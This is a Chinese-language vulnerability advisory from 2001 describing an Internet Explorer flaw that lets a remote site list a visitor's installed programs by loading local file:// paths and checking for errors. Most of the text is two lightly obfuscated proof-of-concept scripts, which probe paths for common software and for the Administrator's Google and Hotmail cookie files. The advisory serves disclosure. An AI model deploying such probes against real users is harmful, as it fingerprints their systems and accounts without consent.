Internet Explorer 可泄露系统信息发布时间:2001-11-07 更新时间:2001-11-07 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Internet Explorer详细描述 IE中存在一个安全落动可以导致远程站点可以通过file://请求和监视返回的错误代码来列举目标用户安装的程序。 测试代码 注意所有出现的'i'有'!'代替。 <!frame src=about:blank id="ifrm" height=1 width=1></iframe> <scr!pt> if(!document.all){alert('Ughh this is IE5+ specific')} head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>' htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+ '<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' + '</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>' tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>' function yup(x) { img[x]+=',<img src="y.jpg">' } function nope(x) { img[x]+=',<img src="x.jpg">' } img=new Array img[1]="LogicTech Cam,C:\\Program Files\\Logitech\\QuickCam\\Samples\\Henry.jpg" img[2]="Icq,C:\\Program Files\\ICQ\\Help\\HelpCards\\images\\bg.gif" img[3]="Interdev,C:\\Program Files\\Microsoft Visual Studio\\VIntDev98\\Samples\\Gallery\\content\\images\\CLOUDS.JPG" img[4]="VisualC,C:\\Program Files\\Microsoft Visual Studio\\VC98\\MFC\\Include\\Res\\TRUETYPE.BMP" img[5]="WinAce,C:\\Program Files\\WinAce\\html\\images\\tip1.gif" img[6]="Acrobat Reader4,C:\\Program Files\\Adobe\\Acrobat 4.0\\Reader\\plug_ins\\WEBBUY\\HTML\\table_btm.gif" img[7]="Adobe PageMaker,C:\\Program Files\\Adobe\\PM65\\RSRC\\USENGLSH\\PLUGINS\\HTMLEXP.GIF" img[8]="MS Office,C:\\Program Files\\Microsoft Office\\Office\\Bitmaps\\Dbwiz\\BOOKS.GIF" img[9]="Delphi6,C:\\Program Files\\Borland\\Delphi6\\BORLAND.GIF" img[10]="Visual Basic 6,C:\\Program Files\\Microsoft Visual Studio\\VB98\\Wizards\\PDWizard\\Setup1\\INSTALL.BMP" img[11]="IIS,C:\\Inetpub\\iissamples\\sdk\\asp\\components\\ie.gif" n=1 function cycle(){ if(n < img.length){ dat=img[n].split(",") img[n]=dat[0] it = "<img src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\" onerror=\"parent.nope(" + n + ")\">" ifrm.document.write(it) document.all.timer.innerText = img.length -n n=n+1 setTimeout("cycle();",1000) }else{ tbl=' ' for(i=1;i<img.length;i++){ tmp=img[i].split(",") tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0]) } document.write(head+tbl+tail) } } cycle() </script> Example 2: <!frame src=about:blank id="ifrm" height=1 width=1></iframe> <scr!pt> if(!document.all){alert('Ughh this is IE5+ specific')} head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>' htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+ '<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' + '</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>' tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>' function yup(x) { img[x]+=',<img src="y.jpg">' } function nope(x) { img[x]+=',<img src="x.jpg">' } function test() { alert('hey there'+n) } img=new Array img[1]="Norton Anti V NT,C:\\Program Files\\Navnt\\end-user.txt" img[2]="Norton AntiV 98,C:\\Program Files\\Norton AntiVirus\\end-user.txt" img[3]="CygWin,C:\\cygwin\\usr\\doc\\lynx\\test\\README.txt" img[4]="NT-Admin(google cookie),C:\\Documents and Settings\\Administrator\\Cookies\\administrator@google[1].txt" img[5]="NT-Admin(hotmail cookie),c:\\Documents and Settings\\Administrator\\Cookies\\administrator@hotmail.msn[1].txt" img[6]="Real Player,C:\\Program Files\\RealPlayer\\channels.xml" img[7]="Eudora 3.x,C:\\Eudora\\Readme.txt" img[8]="Masm,C:\\masm32\\LICENCE\\SDK_EULA.TXT" img[9]="Php,C:\\PHP\\install.txt" img[10]="Perl,C:\\Perl\\html\\EULA-Community_License.txt" n=1 function cycle(){ if(n < img.length){ dat=img[n].split(",") img[n]=dat[0] it = "<iframe src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\">" //onerror='test()'>" ifrm.document.write(it) document.all.timer.innerText = img.length -n n=n+1 setTimeout("cycle();",1000) }else{ tbl=' ' for(i=1;i<img.length;i++){ if(img[i].indexOf('src=') < 1){ nope(i) } tmp=img[i].split(",") tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0]) } document.write(head+tbl+tail) } } cycle() </script> 解决方案 尚无 相关信息 dzzie at yahoo.com |
